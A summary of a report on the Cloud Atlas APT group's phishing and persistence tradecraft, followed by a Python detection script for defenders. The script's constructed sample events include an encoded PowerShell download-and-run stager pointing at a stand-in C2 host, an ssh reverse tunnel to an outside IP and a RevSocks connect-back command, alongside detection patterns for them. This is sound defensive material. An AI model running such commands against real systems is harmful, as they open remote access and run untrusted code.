The report discusses the recent activities of the Cloud Atlas APT group, which persistently targets government entities and commercial sectors in Russia and Belarus. It describes phishing campaigns that deliver malicious shortcuts and PowerShell scripts to gain initial access. Key payloads identified include VBCloud, a backdoor focused on data theft, and PowerShower, used for lateral movement and reconnaissance.
Techniques such as patching RDP functionality, reverse SSH tunneling, and the use of tools such as RevSocks and Tor to maintain persistent access illustrate the attackers' tradecraft. The report also lists specific indicators of compromise, including malicious domains, payload file paths, and forensic artifacts, which can support detection and response efforts against such attacks.
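To make the detection angle concrete, the following added example (not code from the report or from any of the tools it names) runs a few hunt rules over constructed process-creation and DNS events: Explorer spawning a hidden or encoded PowerShell, which is what a double-clicked malicious shortcut typically produces; an `ssh -R` reverse tunnel; a tunnelling tool binary; and a domain IOC match. The event data, the IOC domain, the hypothetical `revsocks.exe`/`tor.exe` file names and the suspicious-flag list are all assumptions made here for illustration.

```python
"""Hunt rules modelled on the tradecraft summarised above. Added example;
the events, the IOC list and the tool file names are constructed here and
are not taken from the report."""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass
class ProcEvent:
    parent: str   # parent image name
    image: str    # created process image name
    cmdline: str  # full command line


def _encode_ps(cmd: str) -> str:
    # PowerShell -EncodedCommand expects base64 of UTF-16LE text.
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


# Constructed telemetry, not real logs. The first event mimics what an LNK
# phishing lure produces: Explorer spawns a hidden, encoded PowerShell.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent("explorer.exe", "powershell.exe",
              "powershell.exe -nop -w hidden -enc "
              + _encode_ps("IEX (New-Object Net.WebClient)"
                           ".DownloadString('http://c2.example.invalid/s')")),
    ProcEvent("explorer.exe", "powershell.exe",
              r"powershell.exe -File C:\Users\alice\scripts\backup.ps1"),
    ProcEvent("cmd.exe", "ssh.exe",
              "ssh.exe -N -R 2222:127.0.0.1:3389 user@203.0.113.10"),
    ProcEvent("cmd.exe", "ssh.exe", "ssh.exe admin@10.0.0.5"),
    ProcEvent("cmd.exe", "revsocks.exe",
              "revsocks.exe -connect 203.0.113.10:443 -pass x"),
]

# Constructed IOC set standing in for the domains the report lists.
IOC_DOMAINS: Set[str] = {"c2.example.invalid"}

# Launch flags that separate a lure from a user running a script by hand.
SUSPICIOUS_PS_FLAGS = re.compile(
    r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|noprofile|nop"
    r"|w(?:indowstyle)?\s+hidden|e(?:xecutionpolicy|p)\s+bypass)\b")
REVERSE_TUNNEL = re.compile(r"(?:^|\s)-R\s*\d+:")  # ssh -R <port>:<host>:<port>
# Hypothetical file names for the tools named in the report; adjust them to
# what your own environment actually observes.
TUNNEL_TOOLS = {"revsocks.exe", "tor.exe"}


def decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext of a -enc/-EncodedCommand argument, or '' if none."""
    m = re.search(r"(?i)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def hunt(events: List[ProcEvent]) -> List[Tuple[str, ProcEvent]]:
    """Apply the rules; returns (rule_name, event) pairs in input order."""
    hits: List[Tuple[str, ProcEvent]] = []
    for ev in events:
        parent, image = ev.parent.lower(), ev.image.lower()
        # A shortcut opened from Explorer shows up as explorer.exe spawning
        # powershell.exe; require hidden/encoded flags to cut false positives.
        if (parent == "explorer.exe" and image == "powershell.exe"
                and SUSPICIOUS_PS_FLAGS.search(ev.cmdline)):
            hits.append(("lnk_powershell", ev))
        if image in ("ssh.exe", "ssh") and REVERSE_TUNNEL.search(ev.cmdline):
            hits.append(("reverse_ssh_tunnel", ev))
        if image in TUNNEL_TOOLS:
            hits.append(("tunnel_tool", ev))
    return hits


def match_ioc_domains(dns_lines: List[str], iocs: Set[str]) -> Dict[str, List[str]]:
    """Map each IOC domain to the DNS log lines that query it or a subdomain."""
    found: Dict[str, List[str]] = {d: [] for d in iocs}
    for line in dns_lines:
        for d in iocs:
            if re.search(r"(?:^|[\s.])" + re.escape(d) + r"(?:\s|$)", line):
                found[d].append(line)
    return found


SAMPLE_DNS = [  # constructed DNS query log lines
    "2024-01-01T10:00:01Z host1 query A c2.example.invalid",
    "2024-01-01T10:00:02Z host1 query A update.example.org",
]

if __name__ == "__main__":
    for rule, ev in hunt(SAMPLE_EVENTS):
        print(f"[{rule}] {ev.parent} -> {ev.image}: {ev.cmdline[:60]}")
        if rule == "lnk_powershell":
            print("   decoded:", decode_encoded_command(ev.cmdline))
    for dom, lines in match_ioc_domains(SAMPLE_DNS, IOC_DOMAINS).items():
        print(f"IOC {dom}: {len(lines)} hit(s)")
```

The parent-process condition on its own is noisy, since any user double-clicking a `.ps1` also yields `explorer.exe -> powershell.exe`; the flag check is what carries the signal, and decoding the `-enc` argument gives the analyst the stager text to pivot on. The `-R` rule catches the tunnel only at process start, so pair it with network telemetry for long-lived sessions.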